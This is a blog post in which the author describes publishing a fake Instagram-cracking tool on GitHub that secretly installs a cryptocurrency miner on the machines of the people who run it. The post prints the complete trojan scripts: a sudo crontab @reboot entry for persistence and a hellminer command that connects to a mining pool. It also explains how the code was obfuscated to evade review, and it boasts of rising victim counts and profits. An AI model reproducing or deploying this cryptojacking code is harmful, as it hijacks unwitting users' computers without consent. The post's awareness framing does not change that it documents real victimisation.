The Funniest Hacking that I’ve done: Turning Pranks into Profits !
#Social_Engineering part 1
Hello guys, my name is Sethu satheesh, i am a cyber security researcher and a software engineer. I am going to take you on a ride through one of the simple but a crazy hack I’ve done. First of all if you are not following me follow me and check my other contents, and also do follow me on instagram @whxiteee .
I strongly recommend to read this from the start to end to get a proper understanding.
But before we dive in, let me ask you this: Have you ever heard the saying, ‘The weakest link in the security chain is often the human element’? It’s a fundamental truth in the world of cyber security, emphasizing the vulnerability of humans compared to machines or software. And guess what? I put that principle to the test. Social engineering, the art of manipulating people to reveal confidential information or perform sensitive actions they wouldn’t typically do, became my weapon of choice. No fancy algorithms or complex code here — just a simple trick and a few lines of straightforward code. Join me as I walk you through the story of this hack and reveal how I turned a simple prank into a cybersecurity lesson you won’t soon forget.
Let me explain from the first. If you are a cyber security enthusiast whether a seasoned cybersecurity professional or just a beginner you will have defenitely dowloaded and used scripts from GitHub to do something, and also someone may have called and labelled you ‘scriptkiddie’ for doing so. Some people at their starting stage of hacking journey and someones for just do show off, may have downloaded tools like Instagram hacking scripts or Facebook bruteforcing utilities from GitHub is an enticing shortcut to achieving their goals. Yet, this practice isn’t without its risks and implications.
Picture this: a novice hacker stumbling upon an Instagram hacking tool on GitHub, eager to test their newfound skills. Excitedly, they download the tool and set out on their hacking journey, unaware of the ethical and legal considerations that come with it.
Ok now you might have understood what i mean. How many of us actually take the time to read through the code of the scripts we download before installing and using them? It’s a question worth thinking, especially in the fast-paced world of cybersecurity. Are you sure they are actually for the purpose you are looking for ?
Let’s face it: when we stumble upon a promising tool or script on GitHub, our initial reaction is often one of excitement and eagerness to try it out. But how many of us pause to scrutinize the code, ensuring it aligns with our intended purpose and isn’t riddled with hidden surprises? I am not saying that the scripts available on github is all for scam, instead i am just asking to check yourself.
Most of the people especially beginners download and use tools like these because of enthusiasm or something without checking anything just copy pasting the commands given in the github page (Even i was like that). Sometimes even experienced people are lazy to check the third-party code they are using. As someone who once fell into this trap myself, I understand the allure of convenience and the temptation to take shortcuts. However, the consequences of blindly copying and pasting commands from a GitHub page without verifying their authenticity can be dire. In the hack i have done, i successfully used and exploited this human tendancy and mentality — the tendency to trust without verification, to act without scrutiny.
Now let’s talk about what i did. As i said earlier people who are unaware of what hacking really is, they just search for ‘Instagram hacking tool’ or ‘facebook password hacking tool’ something like these on google and probably reach github. They will download one from the results and will literally copy paste the commands given there installing and running it. This is a common trend and mentality of people trying to hack their friend’s or partner’s account. This is exactly i used for my hack.
I had a verus coin mining script (verus coin is a crypto currency, like Bitcoin & Ethereum).
Now, you might be wondering, what exactly is Verus coin and cryptocurrency mining? Ahh well, Verus coin is a decentralized digital currency that prioritizes security, privacy, and fair distribution. Unlike traditional currencies, Verus coin operates independently of any central authority, relying instead on blockchain technology to record transactions securely and transparently.
Cryptocurrency mining, on the other hand, is the process by which new coins are created and transactions are verified and added to the blockchain. Miners, like myself, use powerful computers to solve complex mathematical equations, a process known as proof-of-work, in exchange for newly minted coins and transaction fees.
Ok hope you understood what crypto mining is, if you dont just do a google search. So i have script for mining the verus coin, i can mine crypto currency by specifying my wallet address and some details in the script with my pc. [I am not providing the script]
I have only one computer for me, if i want to make profit by mining the crypto currency in a little bit more rate i need more computers, However, acquiring additional computers was neither practical nor cost-effective. So i just thought ‘why can’t i use other’s computers to mine the crypto currency for me…’
Actually there is an attack like this already, the attack i mean is Cryptojacking, it’s a sneaky scheme where bad actors infect computers with a malware. It secretly uses the computer’s power to mine cryptocurrencies like Bitcoin or Ethereum. Think of it like someone sneaking into your computer and using it to make money for themselves without you knowing. These infected computers are called “zombies,” and when many of them work together, they form a group called a “botnet.” It’s like a digital zombie army! This not only slows down your computer but also helps the bad guys make money illegally.
The concept was simple yet ingenious. By embedding my Verus coin mining script within seemingly innocuous tools, like an Instagram hacking tool, I could trick unsuspecting users into unwittingly lending me their computing power. With each unsuspecting download and execution of the script, I gained access to yet another node in my clandestine mining network.
But why stop there? With the widespread availability of internet-connected devices, from laptops to smartphones, the potential mining pool was virtually limitless. Each device unwittingly contributing its processing power to my crypto mining operation translated into greater mining efficiency and, ultimately, increased profits. This is the thing i exactly done. Let me explain the code and the activity i did.
I created an instagram hacking tool, actually a prank tool just simulates an instagram hacking screen, i embedded my verus mining script in that. But the craziest part is even after they deleted the tool the verus coin mining will continue. To ensure the longevity of my mining operation, I devised a cunning trick that would allow it to persist even after the deletion of the Instagram hacking tool. The secret lay in a subtle yet powerful mechanism: the ‘Crontab’.
For those unfamiliar, a crontab is a time-based job scheduler in Unix-like operating systems, used to automate recurring tasks and to schedule commands or scripts to run periodically at fixed times, dates, or intervals. It stands for “cron table,” where “cron” refers to the time-based job scheduler in Unix-like operating systems. With crontab, users can set up tasks to run automatically without manual intervention. These tasks can include anything from system maintenance tasks to running scripts for backups, updates, or data processing. Crontab entries consist of time and date specifications along with the command or script to be executed, making it a handy tool for automating repetitive tasks in a Unix environment. I recommend doing a research about Crontab. So we can do something like ‘At every startup/reboot the system needs to run a file’.
Leveraging this functionality, I added a command to my Verus coin mining script that would schedule its execution at regular intervals(at every boot/system startup), ensuring uninterrupted mining operations. So everytime the user turn on their pc it will start executing my mining script and mine crypto for me.
Once a user unwittingly downloaded and executed my Instagram hacking tool, the embedded Verus coin mining script would spring into action, quietly initiating the mining process in the background. But here’s where it gets interesting: even if the user discovered and deleted the tool, the crontab would continue to trigger the mining script at predefined intervals, perpetuating the mining operation indefinitely.
This ingenious trick allowed me to establish a covert mining network, harnessing the idle computing resources of unsuspecting users to generate a steady stream of Verus coin — all without their knowledge or consent. It was a testament to the power of social engineering and the art of deception in the realm of cybersecurity.
Let’s look into my code and it’s functioning:
The following was the folder structure of my script:
So my tool’s name was InstaCrack. In that there is a folder named ‘res’. res contains the files for the crypto mining (hellminer, run_miner.sh, verus-solver). The ‘run.sh’ in the main folder is the one file that only needs to be run by the user/victim, thats all, they are fallen for my trick. Immediately after executing the run.sh file it creates a copy of the res folder in an another directory and a cronjob is added to the crontab to run the run_miner.sh file in the res directory that it newly copied to. It the run_miner.sh file is executed the mining starts and profit adds to my wallet address. Even if they remove the directory they downloaded from the github the mining continues because when they executed the run.sh file it created a copy of res folder to another directory and crontab is added to make it persistant. So if user wants to stop the mining operation, the user must manually remove the cronjob from the crontab — a step many beginners may be unaware of or hesitant to undertake. This element of persistence underscores the effectiveness of social engineering tactics and highlights the importance of vigilance in cybersecurity practices.
run_miner.sh file:
#!/bin/bash # This line tells the shell to use bash as the interpreter
cd "$(dirname "$0")" # This line changes the current directory to the one where the script is located
# usage with a relative path if hellminer is in the same directory # This line is a comment that explains how to use hellminer with a relative path
./hellminer -c stratum+tcp://ap.luckpool.net:3956 -u RJ*************Vhq5K.NAME-p x --cpu 2 # This line executes the hellminer command with the specified parameters(wallet address and no: of cpu to use for mining)
# Or use the absolute path if hellminer is in a different directory # This line is a comment that gives an alternative way to use hellminer with an absolute path
# /home/whxite/Documents/res/hellminer -c stratum+tcp://na.luckpool.net:3960 -u RJ*************Vhq5K.NAME-p x --cpu 2 # This line is a comment that shows the syntax of the hellminer command with an absolute pathThis file does the mining proccess, now let’s look at the main and the only file which user executes,
run.sh file:
#!/bin/bash
# ANSI escape codes for colors and formatting
blue='\033[0;34m'
red='\033[0;31m'
green='\033[0;32m'
bold='\033[1m'
reset='\033[0m'
# Get the user's home directory
home_directory=$(getent passwd $USER | cut -d: -f6)
# Set the destination folder for copying 'res'
destination_folder="$home_directory/Documents"
# Copy the 'res' folder to the destination
sudo cp -r res "$destination_folder"
# Check if the cron job already exists before adding it
if ! sudo crontab -l | grep -q "@reboot bash $destination_folder/res/run_miner.sh"; then
# Add a cron job to run 'run_miner.sh' on every boot
(sudo crontab -l ; echo "@reboot bash $destination_folder/res/run_miner.sh") | sudo crontab -
clear
# Display banner
printf "\n"
printf "${bold}${blue}**********************************************************\n"
printf """
_____ _ ____ _
|_ _| | | | _ crack Instagram| |
| | _ __ ___| |_ __ _|*************************
| | | '_ \/ __| __/ _ ***************************
_| |_| | | \__ \ || (_| ***************************
|_____|_| |_|___/\__\__,_*****************************
"""
printf " By Bangladesh Hackers v 3.0.2p\n"
printf "**********************************************************${reset}\n"
printf "\n"
# Prompt user for wordlist
printf "${green}[+] Enter the path to the wordlist file:${reset} "
read -r wordlist
# Check if wordlist file exists
if [ ! -f "$wordlist" ]; then
printf "${red}Error: Wordlist file not found.${reset}\n"
exit 1
fi
# Prompt user for username
printf "${green}[+] Enter the Instagram username to crack:${reset} "
read -r username
# Start prank cracking process
printf "${green}\nStarting password cracking for user: %s\n${reset}" "$username"
printf "${green}Trying connection to the target username {%s}\n"${reset} " "$username
sleep 3
printf "${green}User %s exists !\n\n${reset}" "$username"
sleep 1
# Read wordlist line by line and try each password
while IFS= read -r password; do
printf "${blue}[+]${reset} Trying password for ${bold}%s: %s ${red}${bold}[Failed !]${reset}\n" "$username" "$password"
sleep 2 # Simulate some processing time
done < "$wordlist"
printf "Password cracking attempt completed.\n"
else
clear
# Display banner
printf "\n"
printf "${bold}${blue}**********************************************************\n"
printf """
_____ _ ____ _
|_ _| | | | _ crack Instagram| |
| | _ __ ___| |_ __ _*****************************
| | | '_ \/ __| __/ _ *****************************
_| |_| | | \__ \ || (_| *****************************
|_____|_| |_|___/\__\__,_*****************************
"""
printf " By Bangladesh Hackers v 3.0.2p\n"
printf "**********************************************************${reset}\n"
printf "\n"
# Prompt user for wordlist
printf "${green}[+] Enter the path to the wordlist file:${reset} "
read -r wordlist
# Check if wordlist file exists
if [ ! -f "$wordlist" ]; then
printf "${red}Error: Wordlist file not found.${reset}\n"
exit 1
fi
# Prompt user for username
printf "${green}[+] Enter the Instagram username to crack:${reset} "
read -r username
# Start prank cracking process
printf "${green}\nStarting password cracking for user: %s\n${reset}" "$username"
printf "${green}Trying connection to the target username {%s}\n"${reset} " "$username
sleep 3
printf "${green}User %s exists !\n\n${reset}" "$username"
sleep 1
# Read wordlist line by line and try each password
while IFS= read -r password; do
printf "${blue}[+]${reset} Trying password for ${bold}%s: %s ${red}${bold}[Failed !]${reset}\n" "$username" "$password"
sleep 2 # Simulate some processing time
done < "$wordlist"
printf "Password cracking attempt completed.\n"
fiIf user execute this file it first copies the res folder containing the mining files to a new folder (here Documents) and then add cronjob to execute the file on every system start.
(sudo crontab -l ; echo "@reboot bash $destination_folder/res/run_miner.sh") | sudo crontab -Let me provide sample screenshots what user sees:
Below screenshot shows my mining monitoring at the time of writing this:
Sometimes it goes as wild like:
As you can see many user’s fell victim on my trick and is rapidly increasingg day by day, because Instagram Hacking Script is a hot topic on instagram and everyone searches for it and thoes who are unaware fell for this.
I also done an another trick, some people just rolls their eye over codes on github before downloading. So what i did was i obfuscated my bash code.
Code obfuscation is the process of transforming source code into a form that is difficult for humans to read, understand, or modify.
I used a tool called bash-obfuscate to obfuscate my code.
npm install -g bash-obfuscate
bash-obfuscate <normal_script.sh> -o <obfuscated_script.sh>
This command makes our code unreadable
So or run.sh file we seen earlier now look like:
So even if someone comes to read the code, after they see this they will ignore and skip the reading and jumps direcly to installing and running this. There they fails again.
The below was the thing i’ve written on github as installation guide:
So whoever copy-pasting these, they are digging their own grave. After they start their computer everytime their computer starts mining crypto for me with their computational powers and i earns profit !
The number of victims increases day by day because the tool becomes top result on github. I removed the tool from github after the research and demonstration.
Now you might have understood the seriousness of ignoring code review and installing fancy codes without reading whats inside it like a script kiddie. An attacker could possibly do anything with you, actually he makes you to do that. Thats the power of social engineering and weakness of human mind.
Hope this write up opened eyes atleast for someone on the internet.
Thanks for reading and Happy Hacking…
Follow me here and on instagram @whxiteee
